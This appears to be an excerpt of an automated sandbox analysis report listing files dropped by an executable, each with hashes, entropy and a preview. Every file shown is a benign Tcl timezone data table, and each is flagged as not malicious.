                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Winnipeg) {.. {-9223372036854775808 -23316 0 LMT}.. {-2602258284 -21600 0 CST}.. {-1694368800 -18000 1 CDT}.. {-1681671600 -21600 0 CST}.. {-1632067200 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1029686400 -18000 1 CDT}.. {-1018198800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-746035200 -18000 1 CDT}.. {-732733200 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620755200 -18000 1 CDT}.. {-607626000 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8683
                                                                                                                                                                                                                              Entropy (8bit):3.957710943557426
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:po1acs6yyyxC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:p4acsW9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:18EC35FCEC15CE9304818E22222411EF
                                                                                                                                                                                                                              SHA1:F4A04B3E2B5F55C9582F578C3142E706C4EB6BD6
                                                                                                                                                                                                                              SHA-256:79B44F245D86A4EC299D1A9A2EDB2AB92D50AB5A7C1C03759D283AC4070F9005
                                                                                                                                                                                                                              SHA-512:40AC47AC278DF22C7ECFF568456E7C3767B38701B9A2E2639C2201DC53CDD794CF7521BCB773A8AF2A8D4A034D3BBD35BF9788FB5B4E4D51A7A139B3B3353479
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Yakutat) {.. {-9223372036854775808 52865 0 LMT}.. {-3225223727 -33535 0 LMT}.. {-2188953665 -32400 0 YST}.. {-883580400 -32400 0 YST}.. {-880203600 -28800 1 YWT}.. {-769395600 -28800 1 YPT}.. {-765381600 -32400 0 YST}.. {-757350000 -32400 0 YST}.. {-31503600 -32400 0 YST}.. {-21474000 -28800 1 YDT}.. {-5752800 -32400 0 YST}.. {9975600 -28800 1 YDT}.. {25696800 -32400 0 YST}.. {41425200 -28800 1 YDT}.. {57751200 -32400 0 YST}.. {73479600 -28800 1 YDT}.. {89200800 -32400 0 YST}.. {104929200 -28800 1 YDT}.. {120650400 -32400 0 YST}.. {126702000 -28800 1 YDT}.. {152100000 -32400 0 YST}.. {162385200 -28800 1 YDT}.. {183549600 -32400 0 YST}.. {199278000 -28800 1 YDT}.. {215604000 -32400 0 YST}.. {230727600 -28800 1 YDT}.. {247053600 -32400 0 YST}.. {262782000 -28800 1 YDT}.. {278503200 -32400 0 YST}.. {294231600 -28800 1 YDT}.. {30995
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7737
                                                                                                                                                                                                                              Entropy (8bit):3.8656193813344064
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:42GaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:uPlLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:A7606AE597027C26BC90702B2BCC80E9
                                                                                                                                                                                                                              SHA1:7B2AB2E0A23B8D770D1305A171DBCCE2D471EF2F
                                                                                                                                                                                                                              SHA-256:B33838F12640C64BA4F10F50657EC4D8D5B30FD226DA4ACA21B169B53AD30576
                                                                                                                                                                                                                              SHA-512:B18711B4110D6DB0CC7A6EF66639E1B38323F0B61DA4F5287A51BC9EC8534133568C6D3E4F18F6328564DAD291E0CA707768DE4478DD502A40FFD189C08114A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Yellowknife) {.. {-9223372036854775808 0 0 -00}.. {-1104537600 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-147891600 -18000 1 MDDT}.. {-131562000 -25200 0 MST}.. {315558000 -25200 0 MST}.. {325674000 -21600 1 MDT}.. {341395200 -25200 0 MST}.. {357123600 -21600 1 MDT}.. {372844800 -25200 0 MST}.. {388573200 -21600 1 MDT}.. {404899200 -25200 0 MST}.. {420022800 -21600 1 MDT}.. {436348800 -25200 0 MST}.. {452077200 -21600 1 MDT}.. {467798400 -25200 0 MST}.. {483526800 -21600 1 MDT}.. {499248000 -25200 0 MST}.. {514976400 -21600 1 MDT}.. {530697600 -25200 0 MST}.. {544611600 -21600 1 MDT}.. {562147200 -25200 0 MST}.. {576061200 -21600 1 MDT}.. {594201600 -25200 0 MST}.. {607510800 -21600 1 MDT}.. {625651200 -25200 0 MST}.. {638960400 -21600 1 MDT}.. {657100800 -25200 0 MST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):478
                                                                                                                                                                                                                              Entropy (8bit):4.205595904143294
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2L09xSDm2OHE5QMFUH+KNUoTVsBEE0ZZICxZbDtVby:MB862LcUmdHE5QMFi+KdTVPZIwXDy
                                                                                                                                                                                                                              MD5:7D8132A23238C14CCEDD520BBEB49F77
                                                                                                                                                                                                                              SHA1:A8BAE9269DAA2AC535B292E1AE8632B451A0BBA5
                                                                                                                                                                                                                              SHA-256:04247ACB2B4FA126D13F4573FF74D15A89CF42B2C5CD7E688D5BB1C1FD3972BF
                                                                                                                                                                                                                              SHA-512:74FCB14037B0AE11A95B036791D69037590F8EC7F09D90A866E6A6CAAD6D58E4EC3723A3BB356FBF0E25ED1239A5820A8513EBF6653578E4BFB8988D6D20EF13
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Casey) {.. {-9223372036854775808 0 0 -00}.. {-31536000 28800 0 +08}.. {1255802400 39600 0 +11}.. {1267714800 28800 0 +08}.. {1319738400 39600 0 +11}.. {1329843600 28800 0 +08}.. {1477065600 39600 0 +11}.. {1520701200 28800 0 +08}.. {1538856000 39600 0 +11}.. {1552752000 28800 0 +08}.. {1570129200 39600 0 +11}.. {1583596800 28800 0 +08}.. {1601740860 39600 0 +11}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                              Entropy (8bit):4.360007144607037
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2L0mDm2OHEfwz0/MVSYyF/KZ7VoX/MVSYyF/VpVQVF9RXhNXSMVSYy6:MB862LVmdHEIjsF/KZOksF/Vp6v9RRFl
                                                                                                                                                                                                                              MD5:97AA556F7EF06786B76316133794F4E9
                                                                                                                                                                                                                              SHA1:B3CDA284DE80987B954E2CC9BFA3ED33462CDD4F
                                                                                                                                                                                                                              SHA-256:2F36D2E13D7E251322B7A7B30F39645393525CEB49A2B5C26F27797F2AAF4D7F
                                                                                                                                                                                                                              SHA-512:14C6F17252C2AC89D86FE00BD8A8934D627C85478B0AB08AB6237988922D18616B00878498FFFC0E1978308BC6D775E2DC3ADCEF827AB0A06B214BE4DDABAB52
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Davis) {.. {-9223372036854775808 0 0 -00}.. {-409190400 25200 0 +07}.. {-163062000 0 0 -00}.. {-28857600 25200 0 +07}.. {1255806000 18000 0 +05}.. {1268251200 25200 0 +07}.. {1319742000 18000 0 +05}.. {1329854400 25200 0 +07}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):214
                                                                                                                                                                                                                              Entropy (8bit):4.938579775653117
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yci/452HAIgObi/4oA6N/2L0/3Zp5/4pv:MByMdNXiU5t2Lkwv
                                                                                                                                                                                                                              MD5:CC22302B9FAE52E36A2A35C0361E774B
                                                                                                                                                                                                                              SHA1:45CFD95A5821C4C4FDF2E1519F08029FF0BE664B
                                                                                                                                                                                                                              SHA-256:96F2AB9A9FFCD10598FDF105F68460CC4B4EBC1F18054D1BC8E39DF6AD24D1AC
                                                                                                                                                                                                                              SHA-512:FC9084D7B16EAA985681762F2658D32C77EE186D8D3C7225093CC5CB4A6AEB74A3D0A41A904EB6C8AEF7DB110A89497BAFAF811BBC26103F96E5E1D4D4E1002A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Port_Moresby)]} {.. LoadTimeZoneFile Pacific/Port_Moresby..}..set TZData(:Antarctica/DumontDUrville) $TZData(:Pacific/Port_Moresby)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8447
                                                                                                                                                                                                                              Entropy (8bit):3.850137279218428
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:s1qigkx6WsYyS391QiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:s1q05h1QiAmcOM6e0pj
                                                                                                                                                                                                                              MD5:81C612A1544910544173687C416841C6
                                                                                                                                                                                                                              SHA1:4A707B403F0B9556A3D3D50B08BE0F56660F3F0B
                                                                                                                                                                                                                              SHA-256:C4EA7F1C0B5A0FAE653419F1C6D058BDDD745A3CDBA11900005C157DF23DDC01
                                                                                                                                                                                                                              SHA-512:122E2DC3D8D61CCDB83E03C9487DD29AABE7AB3F71FE4F6315209AF0BBCFD01FBDC3A1E3F6D910FB0D690378DF852170A9819D8C1EF96BE6BC8C0811BFB453A9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Macquarie) {.. {-9223372036854775808 0 0 -00}.. {-2214259200 36000 0 AEST}.. {-1680508800 39600 1 AEDT}.. {-1669892400 39600 0 AEDT}.. {-1665388800 36000 0 AEST}.. {-1601719200 0 0 -00}.. {-94730400 36000 0 AEST}.. {-71136000 39600 1 AEDT}.. {-55411200 36000 0 AEST}.. {-37267200 39600 1 AEDT}.. {-25776000 36000 0 AEST}.. {-5817600 39600 1 AEDT}.. {5673600 36000 0 AEST}.. {25632000 39600 1 AEDT}.. {37728000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AEST}.. {152035200 39600 1 AEDT}.. {162921600 36000 0 AEST}.. {183484800 39600 1 AEDT}.. {194976000 36000 0 AEST}.. {215539200 39600 1 AEDT}.. {226425600 36000 0 AEST}.. {246988800 39600 1 AEDT}.. {257875200 36000 0 AEST}.. {278438400 39600 1 AEDT}.. {28932480
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.7511104559982
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2L0GRHEzyeyFNMXGm2OHvavFeVU/VPKVVFSTVF9svUX0VQr:SlSWB9eg/2L0zyfXDm2OHEVy/Ur9s/Vg
                                                                                                                                                                                                                              MD5:7A2AD9BD8F8DEE5C600CABF2D5E9D07B
                                                                                                                                                                                                                              SHA1:CF5D230A29946B7FA3ECD8EB99F1EF1BF0FA5B50
                                                                                                                                                                                                                              SHA-256:ACA533B8BC82296373EDEC82F6E0AA45A34D817C7C18FF5E8E94B81C0BD30259
                                                                                                                                                                                                                              SHA-512:95F8FA68735E88AB15C403191928FA4AA5D1628453BE64B87EE7E8DF9F35FB5DA74A3CED5F5289A13D84A8A12BBB86734E578059CA8B6405399CFF5E33C9384C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Mawson) {.. {-9223372036854775808 0 0 -00}.. {-501206400 21600 0 +06}.. {1255809600 18000 0 +05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):195
                                                                                                                                                                                                                              Entropy (8bit):4.880387042335617
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3ycqXHAIgObOvRN/2L0z6/fy:MByMdTiYt2LrK
                                                                                                                                                                                                                              MD5:88EE32AE5C538AEBFDE2D1D944ED5B2B
                                                                                                                                                                                                                              SHA1:55E7234E6FFF298182A6C8889A9F506CDCE7C959
                                                                                                                                                                                                                              SHA-256:E9D99293C5B275D8E0D7B066084177EDF670D5B52B81E87608BAB02025F33155
                                                                                                                                                                                                                              SHA-512:45A3EA146CA719BA6F22E99EAA57AC1DED1C762E19BDFBA176E5FEAC36EC58586F771572DD16ACE09E660F97DEB91A701BA1B1F1AEF3BD8688F3451C0772420A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Auckland)]} {.. LoadTimeZoneFile Pacific/Auckland..}..set TZData(:Antarctica/McMurdo) $TZData(:Pacific/Auckland)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2613
                                                                                                                                                                                                                              Entropy (8bit):3.6082359166067905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5fzJS6S4wRSenSOaf7HSKSkSqS7STslSmSMSCSxygSiXS/SrS+S9SfShS7SoSlSL:jdeRtnxaf7HlPlgiot7JC/Xk8NWse4rf
                                                                                                                                                                                                                              MD5:BDFA5908E735F866FEC16F6B481AD385
                                                                                                                                                                                                                              SHA1:524AEE21BB97D923A8812A5722AF2FEA43B4D971
                                                                                                                                                                                                                              SHA-256:1637381A20E9D5C6A530F110BDB08D9515E675C9206F000407D8511074948E61
                                                                                                                                                                                                                              SHA-512:3D65C7941BA15A698264848F9B6F43ED5B63D4CF86D495334E8E1DC381D63435E9424BBBC389229693D20044FDB8425A7CC805AB5EA055F59D3E0DD4C7AC2A28
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Palmer) {.. {-9223372036854775808 0 0 -00}.. {-157766400 -14400 0 -04}.. {-152654400 -14400 0 -04}.. {-132955200 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-101419200 -10800 1 -04}.. {-86821200 -14400 0 -04}.. {-71092800 -10800 1 -04}.. {-54766800 -14400 0 -04}.. {-39038400 -10800 1 -04}.. {-23317200 -14400 0 -04}.. {-7588800 -10800 0 -03}.. {128142000 -7200 1 -03}.. {136605600 -10800 0 -03}.. {389070000 -14400 0 -04}.. {403070400 -10800 1 -04}.. {416372400 -14400 0 -04}.. {434520000 -10800 1 -04}.. {447822000 -14400 0 -04}.. {466574400 -10800 1 -04}.. {479271600 -14400 0 -04}.. {498024000 -10800 1 -04}.. {510721200 -14400 0 -04}.. {529473600 -10800 1 -04}.. {545194800 -14400 0 -04}.. {560923200 -10800 1 -04}.. {574225200 -14400 0 -04}.. {592372800 -10800 1 -04}.. {605674800 -14400 0 -04}.. {624427200 -10800 1 -04}.. {63712
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):151
                                                                                                                                                                                                                              Entropy (8bit):4.829975802206526
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2L0GRHEsKRsMXGm2OHvavFN/H3VVFVGAvFv:SlSWB9eg/2L0rRsDm2OHEN/VVFAKV
                                                                                                                                                                                                                              MD5:C330982049AA053DA62B926627D2F2FA
                                                                                                                                                                                                                              SHA1:050CE68265F1A183F0173C825AC59EAE8B6AB9EB
                                                                                                                                                                                                                              SHA-256:943F10D8E836773F0B7ACD13ED8422C0B27813C7BBE0B09B57697D1D70D21ECE
                                                                                                                                                                                                                              SHA-512:DE9953D0E505D6B110C0CC4E756B5B0311646C9CA4703A33B92147D36CFB4C288D73851E6766CE1432F41AB51B5D0A1D58680BDB4E28F067E1D36F670B4A192E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Rothera) {.. {-9223372036854775808 0 0 -00}.. {218246400 -10800 0 -03}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):198
                                                                                                                                                                                                                              Entropy (8bit):4.906125935761354
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3ycqXHAIgObOvRN/2L0tlo+ply:MByMdTiYt2LMq+p8
                                                                                                                                                                                                                              MD5:8095A3749DBDE05377836D74A4EEFE33
                                                                                                                                                                                                                              SHA1:6987CA972B63AE26A65654961588D51D3EF2166C
                                                                                                                                                                                                                              SHA-256:88057832175BB642B23FC99F788A2F78A24005CF1F84A7B1B5E8C84FB8F4D4C1
                                                                                                                                                                                                                              SHA-512:9066104C9C16D2AB88523D651C74CE268468E093A497D128D0D12A986BD62DBC1388A56ED1737C2AFACF04185CF06FD0EE66797A3390B2F0E1EB08A4D92AAFAD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Auckland)]} {.. LoadTimeZoneFile Pacific/Auckland..}..set TZData(:Antarctica/South_Pole) $TZData(:Pacific/Auckland)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.871844665431957
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8t14XHAIgNsM13oOARL/2L0GRHEtWlFBQWFK81Fn:SlSWB9vsM3yN14HAIgaM1YOAN/2L0tQB
                                                                                                                                                                                                                              MD5:CA52057130DCF506D11A7CC069F4FBA3
                                                                                                                                                                                                                              SHA1:2C38B7E7872BB41C3569DFCB539C3EC3AAE24FDD
                                                                                                                                                                                                                              SHA-256:2488805DE4FEA42305689F679F1AE2D80B1E934E657FEA329AD39A82DAC63022
                                                                                                                                                                                                                              SHA-512:B19D409870939C8F0834C6C028239E010EE5128DFA6E97D4903BECA229B04FE530EA376B936767D9BFE21709720C1791289D8E3622B17C18F2680B0670794A02
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Riyadh)]} {.. LoadTimeZoneFile Asia/Riyadh..}..set TZData(:Antarctica/Syowa) $TZData(:Asia/Riyadh)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5370
                                                                                                                                                                                                                              Entropy (8bit):3.5134546899897146
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:YveRdmbxnKIJqU9XThVIsopb8BcrFgoZVlzeEG+PtJ:UeRdmNnKIIajfopb3FVVJ
                                                                                                                                                                                                                              MD5:442F495C36B31CA5D7A9BEFF12105AEF
                                                                                                                                                                                                                              SHA1:B3F6CA5B4A5756F9B2C09A27198F7A651CC6032D
                                                                                                                                                                                                                              SHA-256:6FD5AB8B7B308CDCEA4B747A81D8675988AE218813C91714FC4CA97919CEBEA5
                                                                                                                                                                                                                              SHA-512:C6EAECC26D67D218615EBB5602639DAB62A2578BD9683553D765DC1AC5580627D29B6F911388F5F1BFC284278EA4EBECE94630D3C6B95FF9EF93D3D61A3C2028
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Troll) {.. {-9223372036854775808 0 0 -00}.. {1108166400 0 0 +00}.. {1111885200 7200 1 +02}.. {1130634000 0 0 +00}.. {1143334800 7200 1 +02}.. {1162083600 0 0 +00}.. {1174784400 7200 1 +02}.. {1193533200 0 0 +00}.. {1206838800 7200 1 +02}.. {1224982800 0 0 +00}.. {1238288400 7200 1 +02}.. {1256432400 0 0 +00}.. {1269738000 7200 1 +02}.. {1288486800 0 0 +00}.. {1301187600 7200 1 +02}.. {1319936400 0 0 +00}.. {1332637200 7200 1 +02}.. {1351386000 0 0 +00}.. {1364691600 7200 1 +02}.. {1382835600 0 0 +00}.. {1396141200 7200 1 +02}.. {1414285200 0 0 +00}.. {1427590800 7200 1 +02}.. {1445734800 0 0 +00}.. {1459040400 7200 1 +02}.. {1477789200 0 0 +00}.. {1490490000 7200 1 +02}.. {1509238800 0 0 +00}.. {1521939600 7200 1 +02}.. {1540688400 0 0 +00}.. {1553994000 7200 1 +02}.. {1572138000 0 0 +00}.. {1585443600 7200 1 +02}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.940298769001579
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8s4YkyXHAIgNrYOARL/2L0GRHEoKcMFeWFKjov:SlSWB9vsM3yMGSHAIgvAN/2L0XcMFewh
                                                                                                                                                                                                                              MD5:F61B4D02530B54A8EB1CA7B34BF6D553
                                                                                                                                                                                                                              SHA1:EB85E044EF9F7D11310C5EBB8D1D0C49A1E3067F
                                                                                                                                                                                                                              SHA-256:1892E98C13AC141C8C92EAB942B073A464BA5E2C000C250F97F860BE6B108127
                                                                                                                                                                                                                              SHA-512:E725E909A4056B7E4FADBE66B69E6C4752595F3357E670A7D740A2DA957F2C9502ECA57B9BA874045ED032B8F65A10D11AFAF69EA9673187FD4AE08793492470
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Urumqi)]} {.. LoadTimeZoneFile Asia/Urumqi..}..set TZData(:Antarctica/Vostok) $TZData(:Asia/Urumqi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.947168975083595
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/2XbeLo4cA4FH/h8QahV:SlSWB9vsM3ymhVoPHAIgoh6N/2XbUyAH
                                                                                                                                                                                                                              MD5:A4F076D7D716467B78EA382FA222CB38
                                                                                                                                                                                                                              SHA1:21D7FBA308ADC652F541A0336929B862F7B1BD0B
                                                                                                                                                                                                                              SHA-256:25462B656D240DA6B01C1A630FAC04B25DD65C799B659BE1C8BD3AB62610966F
                                                                                                                                                                                                                              SHA-512:1B6BD455E533D5BDC7F3506561A9CA804B1F9CA5CC0665AAB0FC083106AB32FF149DD5FFF62EF7BABAD87E3274F264446D492FB8BE160C9C7F281C7060BF1F61
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Arctic/Longyearbyen) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):171
                                                                                                                                                                                                                              Entropy (8bit):4.829666491766117
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8t14XHAIgNsM13oOARL/2WFK4h4WFK81Fn:SlSWB9vsM3yN14HAIgaM1YOAN/2wKs46
                                                                                                                                                                                                                              MD5:60D7F3194F19179E0CF0F561F9C40EE6
                                                                                                                                                                                                                              SHA1:B079EC49485CFBFFB7A5BE6149319B75684258E9
                                                                                                                                                                                                                              SHA-256:8FCDDB246932BAED880B70C0CA867057E7989AEA55EDDC174430E1055CD1058D
                                                                                                                                                                                                                              SHA-512:0BDC86B1D473D4875C6F7C092F955D0999E6C1F2EF83CFC7726A3C5BFEB0F5CB8E00B1F0CBC1F91F806EC635C472927504DF681A32DAC55EF372DA16FEA9EF40
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Riyadh)]} {.. LoadTimeZoneFile Asia/Riyadh..}..set TZData(:Asia/Aden) $TZData(:Asia/Riyadh)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1637
                                                                                                                                                                                                                              Entropy (8bit):3.732051305399264
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5qehddmvOt81FCuLqecDngO6jPvTpYy5T4TXvKT10SvPFu+a+CK/Eu3CWuD0Vob1:5YvdJqxiF0rvK50Sv9fGSM
                                                                                                                                                                                                                              MD5:D6BCB21F65642F36A159AFD72EC93953
                                                                                                                                                                                                                              SHA1:D3E670E579924E6E4F04AB574D48334FF521D8B2
